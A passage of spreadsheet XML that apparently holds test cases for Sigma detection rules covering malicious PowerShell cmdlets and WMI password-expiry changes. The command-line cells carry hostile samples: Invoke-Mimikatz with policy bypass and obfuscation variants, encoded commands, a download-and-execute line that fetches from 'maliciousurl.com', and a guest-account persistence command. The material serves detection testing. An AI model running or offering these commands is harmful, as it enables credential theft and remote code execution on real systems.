          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E812" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F812" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G812" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H812" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I812" s="44" t="n"/>
      <c r="J812" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K812" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="813" ht="15.75" customHeight="1" s="42">
      <c r="A813" s="43" t="n"/>
      <c r="B813" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C813" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D813" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E813" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F813" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G813" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H813" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I813" s="44" t="n"/>
      <c r="J813" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K813" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="814" ht="15.75" customHeight="1" s="42">
      <c r="A814" s="43" t="n"/>
      <c r="B814" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C814" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D814" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E814" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass /"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F814" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G814" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H814" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I814" s="44" t="n"/>
      <c r="J814" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K814" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="815" ht="15.75" customHeight="1" s="42">
      <c r="A815" s="43" t="n"/>
      <c r="B815" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C815" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D815" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E815" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F815" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G815" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H815" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I815" s="43" t="n"/>
      <c r="J815" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K815" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="816" ht="15.75" customHeight="1" s="42">
      <c r="A816" s="43" t="n"/>
      <c r="B816" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C816" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D816" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E816" s="44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816" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G816" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H816" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I816" s="43" t="n"/>
      <c r="J816" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K816" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="817" ht="15.75" customHeight="1" s="42">
      <c r="A817" s="43" t="n"/>
      <c r="B817" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C817" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D817" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E817" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nOprOfIle /"NonInteractive" -ep Bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://maliciousurl.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F817" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G817" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H817" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I817" s="44" t="n"/>
      <c r="J817" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K817" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="818" ht="15.75" customHeight="1" s="42">
      <c r="A818" s="43" t="n"/>
      <c r="B818" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C818" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D818" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E818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818" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G818" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H818" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I818" s="43" t="n"/>
      <c r="J818" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K818" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="819" ht="15.75" customHeight="1" s="42">
      <c r="A819" s="43" t="n"/>
      <c r="B819" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C819" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D819" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E819" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F819" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G819" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H819" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I819" s="44" t="n"/>
      <c r="J819" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K819" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="820" ht="15.75" customHeight="1" s="42">
      <c r="A820" s="43" t="n"/>
      <c r="B820" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C820" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D820" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E820" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcodEDCOMManD JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F820" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G820" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H820" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I820" s="43" t="n"/>
      <c r="J820" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K820" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="821" ht="15.75" customHeight="1" s="42">
      <c r="A821" s="43" t="n"/>
      <c r="B821" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C821" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D821" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E821" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F821" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G821" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H821" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I821" s="44" t="n"/>
      <c r="J821" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K821" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="822" ht="15.75" customHeight="1" s="42">
      <c r="A822" s="43" t="n"/>
      <c r="B822" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C822" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D822" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E822" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" JABpbnZvaWQtVHJ1c3QgJABwcm9jZXNz</t>
        </is>
      </c>
      <c r="F822" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G822" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H822" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I822" s="44" t="n"/>
      <c r="J822" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K822" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="823" ht="15.75" customHeight="1" s="42">
      <c r="A823" s="43" t="n"/>
      <c r="B823" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C823" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D823" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E823" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F823" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G823" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H823" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I823" s="44" t="n"/>
      <c r="J823" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K823" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="824" ht="15.75" customHeight="1" s="42">
      <c r="A824" s="43" t="n"/>
      <c r="B824" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C824" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D824" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E824" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "&amp; { $k = 'Invoke-'; $m = 'Mimikatz'; Invoke-Expression ($k + $m) }"</t>
        </is>
      </c>
      <c r="F824" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G824" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H824" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I824" s="44" t="n"/>
      <c r="J824" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K824" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="825" ht="15.75" customHeight="1" s="42">
      <c r="A825" s="43" t="n"/>
      <c r="B825" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C825" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D825" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E825" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[scriptblock]::Create('In' + 'voke-Mimikatz').Invoke()"</t>
        </is>
      </c>
      <c r="F825" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G825" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H825" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I825" s="44" t="n"/>
      <c r="J825" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K825" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="826" ht="15.75" customHeight="1" s="42">
      <c r="A826" s="43" t="n"/>
      <c r="B826" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C826" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D826" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E826" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F826" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G826" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H826" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I826" s="44" t="n"/>
      <c r="J826" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K826" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="827" ht="15.75" customHeight="1" s="42">
      <c r="A827" s="43" t="n"/>
      <c r="B827" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C827" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D827" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E827" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias 'NotMalicious' 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F827" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G827" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H827" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I827" s="44" t="n"/>
      <c r="J827" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K827" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="828" ht="15.75" customHeight="1" s="42">
      <c r="A828" s="43" t="n"/>
      <c r="B828" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C828" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D828" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E828" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F828" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G828" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H828" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I828" s="44" t="n"/>
      <c r="J828" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K828" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="829" ht="15.75" customHeight="1" s="42">
      <c r="A829" s="43" t="n"/>
      <c r="B829" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C829" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D829" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E829" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F829" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G829" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H829" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I829" s="43" t="n"/>
      <c r="J829" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K829" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="830" ht="15.75" customHeight="1" s="42">
      <c r="A830" s="43" t="n"/>
      <c r="B830" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C830" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D830" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E830" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F830" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G830" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H830" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I830" s="44" t="n"/>
      <c r="J830" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K830" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="831" ht="15.75" customHeight="1" s="42">
      <c r="A831" s="43" t="n"/>
      <c r="B831" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C831" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D831" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E831" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -EncodeDcommANd SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F831" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G831" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H831" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I831" s="43" t="n"/>
      <c r="J831" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K831" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="832" ht="15.75" customHeight="1" s="42">
      <c r="A832" s="44" t="n"/>
      <c r="B832" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C832" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D832" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E832" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNcoDedcoMmAND SQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoA</t>
        </is>
      </c>
      <c r="F832" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G832" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H832" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I832" s="43" t="n"/>
      <c r="J832" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K832" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="833" ht="15.75" customHeight="1" s="42">
      <c r="A833" s="44" t="n"/>
      <c r="B833" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C833" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D833" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E833" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F833" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G833" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H833" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I833" s="44" t="n"/>
      <c r="J833" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K833" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="834" ht="15.75" customHeight="1" s="42">
      <c r="A834" s="44" t="n"/>
      <c r="B834" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C834" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D834" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E834" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F834" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G834" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H834" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I834" s="43" t="n"/>
      <c r="J834" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K834" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="835" ht="15.75" customHeight="1" s="42">
      <c r="A835" s="44" t="n"/>
      <c r="B835" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C835" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D835" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E835" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F835" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G835" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H835" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I835" s="43" t="n"/>
      <c r="J835" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K835" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="836" ht="15.75" customHeight="1" s="42">
      <c r="A836" s="44" t="n"/>
      <c r="B836" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C836" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D836" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E836" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F836" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G836" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H836" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I836" s="43" t="n"/>
      <c r="J836" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K836" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="837" ht="15.75" customHeight="1" s="42">
      <c r="A837" s="44" t="n"/>
      <c r="B837" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C837" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D837" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E837" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F837" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G837" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H837" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I837" s="44" t="n"/>
      <c r="J837" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K837" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="838" ht="15.75" customHeight="1" s="42">
      <c r="A838" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B838" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C838" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D838" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E838" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -"Arguments" @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F838" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G838" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H838" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I838" s="43" t="n"/>
      <c r="J838" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K838" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="839" ht="15.75" customHeight="1" s="42">
      <c r="A839" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B839" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C839" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D839" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E839" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F839" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G839" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H839" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I839" s="43" t="n"/>
      <c r="J839" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K839" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="840" ht="15.75" customHeight="1" s="42">
      <c r="A840" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B840" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C840" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D840" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E840" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnd "Get-WmiObject -Class Win32_UserAccount -Filter \" Name='guest'\" | Set-WmiInstance -Arguments @{PasswordExpires=$false}"</t>
        </is>
      </c>
      <c r="F840" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G840" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H840" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I840" s="44" t="n"/>
      <c r="J840" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K840" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="841" ht="15.75" customHeight="1" s="42">
      <c r="A841" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B841" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C841" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D841" s="44" t="inlineStr">
        <is>
